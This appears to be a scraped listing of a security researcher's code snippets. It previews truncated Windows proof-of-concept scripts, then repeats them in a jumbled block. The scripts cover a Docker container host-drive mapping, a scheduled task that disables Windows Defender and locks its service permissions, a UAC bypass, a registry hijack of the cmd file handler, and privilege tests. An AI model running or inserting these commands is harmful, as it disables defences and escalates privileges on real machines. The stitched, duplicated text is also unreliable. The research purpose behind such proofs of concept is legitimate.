James Forshaw tyranid

## map_host_drive.ps1
Param(
    [Parameter(Mandatory, Position = 0)]
    [string]$HostDrive,
    [Parameter(Mandatory, Position = 1)]
    [string]$LocalDrive
)

# Script to map a host drive inside a Windows Docker Server Container
# You need to be an admin in the container for this to work.
# Use as .\map_host_drive C: X:

## doh.ps1
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')

## kill_file_locker.ps1
Import-Module NtObjectManager

<#
Function to kill all processes which are using a locked file.
#>
function Kill-FileLocker {
    param(
        [Parameter(Mandatory)]
        [string]$Path
    )

## bypass_uac.ps1
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.

Import-Module NtObjectManager

## ntfs_testcase.cpp
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <string>

int _tmain(int argc, _TCHAR* argv[])
{
	for (int i = 1; i < 128; ++i)
	{
		std::wstring name = L".\a";

## cmdfile registration
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Classes\cmdfile\shell\open\command]
@="c:\\windows\\system32\\calc.exe"

## Test for MS14-027
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>

int wmain(int argc, WCHAR* argv[])
{
	if (argc < 2)
	{
		printf("Usage: ImpersonateSHExec filename [sessionid]\n");
		return 1;
	Param(
	[Parameter(Mandatory, Position = 0)]
	[string]$HostDrive,
	[Parameter(Mandatory, Position = 1)]
	[string]$LocalDrive
	)

	# Script to map a host drive inside a Windows Docker Server Container
	# You need to be an admin in the container for this to work.
	# Use as .\map_host_drive C: X:
	$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

	$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
	Register-ScheduledTask -TaskName 'TestTask' -Action $a

	$svc = New-Object -ComObject 'Schedule.Service'
	$svc.Connect()

	$user = 'NT SERVICE\TrustedInstaller'
	$folder = $svc.GetFolder('\')
	Import-Module NtObjectManager

	<#
	Function to kill all processes which are using a locked file.
	#>
	function Kill-FileLocker {
	param(
	[Parameter(Mandatory)]
	[string]$Path
	)
	# Powershell script to bypass UAC on Vista+ assuming
	# there exists one elevated process on the same desktop.
	# Technical details in:
	# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
	# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
	# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
	# You need to Install-Module NtObjectManager for this to run.

	Import-Module NtObjectManager
	#include <stdio.h>
	#include <tchar.h>
	#include <Windows.h>
	#include <string>

	int _tmain(int argc, _TCHAR* argv[])
	{
	for (int i = 1; i < 128; ++i)
	{
	std::wstring name = L".\a";
	Windows Registry Editor Version 5.00

	[HKEY_CURRENT_USER\SOFTWARE\Classes\cmdfile\shell\open\command]
	@="c:\\windows\\system32\\calc.exe"